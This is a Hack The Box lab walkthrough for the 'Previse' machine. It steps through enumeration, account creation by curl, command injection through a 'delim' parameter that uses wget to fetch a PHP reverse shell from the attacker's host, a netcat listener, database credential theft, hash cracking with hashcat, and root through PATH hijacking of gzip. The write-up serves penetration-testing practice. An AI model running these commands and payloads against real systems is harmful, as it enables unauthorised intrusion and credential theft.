HTB — Previse Walkthroughs
--
Enumeration
enumeration previse machine with nmap using command :
nmap -sV -sC {ip}
- -sV — shows port versions
- -sC — make script scan against the port
We see that only ports 22 and 80 are opened.
22 — SSH
80 — HTTP
lets dig in and visit http port :)
ups, its only login page. the things we can do is brute force or make SQL injection which does not work at this point.
continue enumeration and start directory scan with ffuf.
ffuf -c -w /usr/share/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -u http://10.10.11.104/FUZZ
- -c — used for colored status codes
- -w — wordlist path
- -u — target ip
result shows us that that where is no interesting web page. lets make again directory enumeration with .php extension
ffuf -c -w /usr/share/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -u http://10.10.11.104/FUZZ.php
at this point we will see something interesting.
here are tons of pages which should be exploitable.
most interesting page is nav.php. lets visit and see result
we will see result like this but whats next ? we cannot access any of this links because it redirects us to login page. it says 302 status code which is redirect response
lets use curl against accounts.php page
curl -i -X GET http://10.10.11.104/accounts.php
- -i — show us headers
- -X GET — used for GET Request
Boom ! we got a source code of accounts.php file. now lets dig in and see what is in
we mention that where is a typical registration form with name fields — username, password and confirm password
what we should do next ? we can send POST request with curl to make user and after login with our own user.
command look like this :
curl -X POST -d “username=someone&password=12345678&confirm=12345678” http://10.10.11.104/accounts.php
- X POST — used for POST request
- -d — used to send parameter like username, password and confirm password
after this command we can access website with username — someone and password — 12345678
we are in :)
now we have to enumerate website and most interesting directory is files.php but unfortunately we have not access to open our uploaded shell. the only permision we have is to download SITEBACKUP.zip file
lets download and dig into that file
we got a source code of that website pages. we have to dig into them and after some research we found a logs.php which contain interesting code. it looks like this
what does it says ? is says that if we are logged in and send POST request with parameter delim, it will execute command with exec function.
lets see this page on the website where it is used to send delim parameter.
its a file_logs.php where we can send comma, space and tab requests with parameter delim
now we can exploit it to send delim parameter and our reverse shell.
Firstly we have to gather our session and when send POST requests via curl against logs.php file where exec function is stored
Download PHP reverse shell from https://github.com/pentestmonkey/php-reverse-shell/blob/master/php-reverse-shell.php and change IP and PORT !
Now lets upload our reverse shell into website via curl.
Start python server :
when use curl command :
curl -X POST -b “PHPSESSID=3g4cpjgge5qo15u9obnfafpd9j” -d ‘delim=space; wget http://10.10.16.19/php_reverse.php' http://10.10.11.104/logs.php
- b — PHP session, make sure to use your own session
- -d — send POST data with parameter delim
And we will successfully upload our PHP reverse shell into website
Lets visit our payload. in my case it is http://10.10.11.104/php_reverse.php.
before visit that URL, start nc listener :
The moment when we access URL which i mention above , we will get access on the server
Congratulation :)) we are in but it isn’t end. we haven’t access on user.txt which is stored into m4lwhere home folder.
Firstly we have to upgrade our shell into tty with command :
python3 -c ‘import pty; pty.spawn(“/bin/bash”)’
Next make some search into /var/www/html directory. open config.php file where MYSQL credentials are stored
After dig into MYSQL, we will see accounts table which contain hashed password of m4lwhere user — $1$🧂llol$DQpmdvnb7EeuO6UaqRItf.
Crack that hashed password with hashcat
hashcat -a 0 -m 500 ‘$1$🧂llol$DQpmdvnb7EeuO6UaqRItf.’ /usr/share/wordlists/rockyou.txt
Congratulations we get m4lwhere user password
Login with m4lwhere and get a User.txt :)
Privilege Escalation
Check our sudo privilege with Sudo -l
it says that we have sudo access on /opt/scripts/access_backup.
lets dig into that file. we will see that gzip command is used which is exploitable with $PATH
Make executable reverse shell file into /tmp directory and name it gzip.sh. change $PATH variable with command export PATH=/tmp:$PATH
Next when we run sudo /opt/scripts/access_backup.sh , we will get root access
Enjoy :)